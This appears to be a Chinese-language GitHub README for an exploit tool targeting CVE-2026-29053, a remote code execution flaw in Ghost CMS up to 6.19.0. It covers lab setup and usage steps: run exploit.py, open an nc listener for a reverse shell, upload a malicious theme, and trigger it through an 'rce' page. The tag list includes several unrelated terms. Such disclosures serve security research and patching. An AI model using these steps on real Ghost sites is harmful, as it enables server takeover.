rootxran/CVE-2026-29053
GitHub: rootxran/CVE-2026-29053
针对 Ghost CMS 6.19.0 及以下版本的远程代码执行漏洞利用工具,通过 jsonpath/static-eval 原型链污染实现 RCE。
Stars: 0 | Forks: 0
# CVE-2026-29053
通过 jsonpath/static-eval 原型链实现的 Ghost CMS RCE。
## 信息
- **CVE**: CVE-2026-29053
- **受影响版本**: Ghost <= 6.19.0,包含 jsonpath 1.1.1 + static-eval 2.0.2
- **修复版本**: 6.19.1
## 演示
[CVE-2026-29053.webm](https://github.com/user-attachments/assets/eb749663-ffa2-4fdd-b7b7-f6cb20c3e16e)
## 搭建漏洞环境
```
cd build
./build.sh
```
## 使用方法
```
python3 exploit.py -i -p
```
1. 启动监听器:`nc -lvnp `
2. 将 `malicious-theme.zip` 上传至 Ghost Admin → Settings → Design
3. 创建一个 slug 为 `rce` 的页面
4. 访问 `/rce/`
## 参考资料
- https://github.com/TryGhost/Ghost/security/advisories/GHSA-cgc2-rcrh-qr5x
- https://www.endorlabs.com/learn/rce-in-ghost-cms-ghsa-cgc2-rcrh-qr5x
标签:0day, CISA项目, Cutter, CVE-2026-29053, Exploit, Ghost CMS, GNU通用公共许可证, jsonpath, Node.js, PE 加载器, PoC, RCE, static-eval, Web安全, 原型链污染, 安全漏洞, 恶意主题上传, 数据可视化, 暴力破解, 编程工具, 蓝队分析, 请求拦截, 远程代码执行, 逆向工具